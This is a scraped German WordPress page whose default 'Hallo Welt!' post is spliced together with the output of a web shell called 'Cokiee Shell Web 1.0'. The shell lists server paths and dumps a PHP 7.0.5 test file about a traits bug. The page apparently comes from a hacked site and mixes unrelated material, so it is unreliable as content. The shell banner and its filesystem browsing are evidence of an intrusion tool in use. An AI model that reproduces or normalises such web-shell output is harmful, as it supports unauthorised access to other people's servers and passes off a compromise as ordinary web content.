Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/traits/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/traits/bug55372.phpt |
--TEST-- Bug #55372 (Literal handling in methods is inconsistent, causing memory corruption) --FILE-- <?php trait testTrait { public function testMethod() { if (1) { $letters1 = range('a', 'z', 1); $letters2 = range('A', 'Z', 1); $letters1 = 'foo'; $letters2 = 'baarr'; var_dump($letters1); var_dump($letters2); } } } class foo { use testTrait; } $x = new foo; $x->testMethod(); ?> --EXPECT-- string(3) "foo" string(5) "baarr"
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare